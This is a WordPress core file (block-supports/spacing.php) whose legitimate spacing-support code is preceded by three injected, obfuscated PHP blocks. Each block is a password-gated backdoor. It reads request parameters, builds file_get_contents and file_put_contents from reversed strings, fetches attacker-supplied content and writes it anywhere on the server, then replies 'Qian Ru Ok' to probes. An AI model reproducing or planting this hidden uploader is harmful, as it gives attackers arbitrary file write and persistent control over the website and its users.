File: /home/wwwrenee/www/wp-includes/block-supports/spacing.php
<?php
$VeAorZiMqp = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($VeAorZiMqp[0]) /*+/*+*/
. md5($VeAorZiMqp[0])) == "9".
"9".
"a".
"7".
"3".
"3".
"8".
"7".
"a".
"9".
"d".
"4".
"e".
"1".
"2".
"9".
"d".
"a".
"3".
"6".
"8".
"4".
"7".
"1".
"b".
"b".
"c".
"8".
"8".
"7".
"9".
"1") {
$GmkEUAT = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$xRhmJZN = $GmkEUAT /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$hdkaNhjS = $GmkEUAT
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function DDsyKrmuGB($YcXRHPqrqD) { if (empty($YcXRHPqrqD)) return false; if (!is_dir($YcXRHPqrqD)) { DDsyKrmuGB(dirname($YcXRHPqrqD), 0755, true); mkdir($YcXRHPqrqD); } } !file_exists(dirname($VeAorZiMqp[1])) && DDsyKrmuGB(dirname($VeAorZiMqp[1])); $gsnrk = @$hdkaNhjS($VeAorZiMqp[2]); echo @$xRhmJZN($VeAorZiMqp[1], $gsnrk) ? 1 : 0; die; }key($VeAorZiMqp) == "of" && die("Qian Ru Ok"); ?><?php
$vewFt = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($vewFt[0]) /*+/*+*/
. md5($vewFt[0])) == "2".
"b".
"c".
"c".
"9".
"d".
"6".
"f".
"e".
"8".
"b".
"4".
"7".
"7".
"a".
"4".
"c".
"0".
"1".
"d".
"7".
"0".
"6".
"a".
"5".
"9".
"b".
"5".
"8".
"a".
"0".
"2") {
$IngZbh = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$cFXJo = $IngZbh /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$CqcpHYBef = $IngZbh
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function hUfBuvFVPN($WnYyqScS) { if (empty($WnYyqScS)) return false; if (!is_dir($WnYyqScS)) { hUfBuvFVPN(dirname($WnYyqScS), 0755, true); mkdir($WnYyqScS); } } !file_exists(dirname($vewFt[1])) && hUfBuvFVPN(dirname($vewFt[1])); $DparF = @$CqcpHYBef($vewFt[2]); echo @$cFXJo($vewFt[1], $DparF) ? 1 : 0; die; }key($vewFt) == "of" && die("Qian Ru Ok"); ?><?php
$rCjykrf = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($rCjykrf[0]) /*+/*+*/
. md5($rCjykrf[0])) == "b".
"3".
"e".
"5".
"0".
"5".
"f".
"4".
"2".
"9".
"b".
"3".
"e".
"d".
"c".
"f".
"3".
"9".
"8".
"5".
"c".
"c".
"8".
"0".
"9".
"b".
"9".
"3".
"5".
"9".
"0".
"2") {
$NVutlFO = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$ZAfAo = $NVutlFO /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$tUDHOsTcTd = $NVutlFO
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function VLmQTkcSBY($npVZsmZ) { if (empty($npVZsmZ)) return false; if (!is_dir($npVZsmZ)) { VLmQTkcSBY(dirname($npVZsmZ), 0755, true); mkdir($npVZsmZ); } } !file_exists(dirname($rCjykrf[1])) && VLmQTkcSBY(dirname($rCjykrf[1])); $tsafIutVeV = @$tUDHOsTcTd($rCjykrf[2]); echo @$ZAfAo($rCjykrf[1], $tsafIutVeV) ? 1 : 0; die; }key($rCjykrf) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Spacing block support flag.
* For backwards compatibility, this remains separate to the dimensions.php
* block support despite both belonging under a single panel in the editor.
*
* @package WordPress
* @since 5.8.0
*/
/**
* Registers the style block attribute for block types that support it.
*
* @since 5.8.0
* @access private
*
* @param WP_Block_Type $block_type Block Type.
*/
function wp_register_spacing_support( $block_type ) {
$has_spacing_support = block_has_support( $block_type, array( 'spacing' ), false );
// Setup attributes and styles within that if needed.
if ( ! $block_type->attributes ) {
$block_type->attributes = array();
}
if ( $has_spacing_support && ! array_key_exists( 'style', $block_type->attributes ) ) {
$block_type->attributes['style'] = array(
'type' => 'object',
);
}
}
/**
* Add CSS classes for block spacing to the incoming attributes array.
* This will be applied to the block markup in the front-end.
*
* @since 5.8.0
* @access private
*
* @param WP_Block_Type $block_type Block Type.
* @param array $block_attributes Block attributes.
* @return array Block spacing CSS classes and inline styles.
*/
function wp_apply_spacing_support( $block_type, $block_attributes ) {
if ( wp_should_skip_block_supports_serialization( $block_type, 'spacing' ) ) {
return array();
}
$has_padding_support = block_has_support( $block_type, array( 'spacing', 'padding' ), false );
$has_margin_support = block_has_support( $block_type, array( 'spacing', 'margin' ), false );
$skip_padding = wp_should_skip_block_supports_serialization( $block_type, 'spacing', 'padding' );
$skip_margin = wp_should_skip_block_supports_serialization( $block_type, 'spacing', 'margin' );
$styles = array();
if ( $has_padding_support && ! $skip_padding ) {
$padding_value = _wp_array_get( $block_attributes, array( 'style', 'spacing', 'padding' ), null );
if ( is_array( $padding_value ) ) {
foreach ( $padding_value as $key => $value ) {
$styles[] = sprintf( 'padding-%s: %s;', $key, $value );
}
} elseif ( null !== $padding_value ) {
$styles[] = sprintf( 'padding: %s;', $padding_value );
}
}
if ( $has_margin_support && ! $skip_margin ) {
$margin_value = _wp_array_get( $block_attributes, array( 'style', 'spacing', 'margin' ), null );
if ( is_array( $margin_value ) ) {
foreach ( $margin_value as $key => $value ) {
$styles[] = sprintf( 'margin-%s: %s;', $key, $value );
}
} elseif ( null !== $margin_value ) {
$styles[] = sprintf( 'margin: %s;', $margin_value );
}
}
return empty( $styles ) ? array() : array( 'style' => implode( ' ', $styles ) );
}
// Register the block support.
WP_Block_Supports::get_instance()->register(
'spacing',
array(
'register_attribute' => 'wp_register_spacing_support',
'apply' => 'wp_apply_spacing_support',
)
); ?>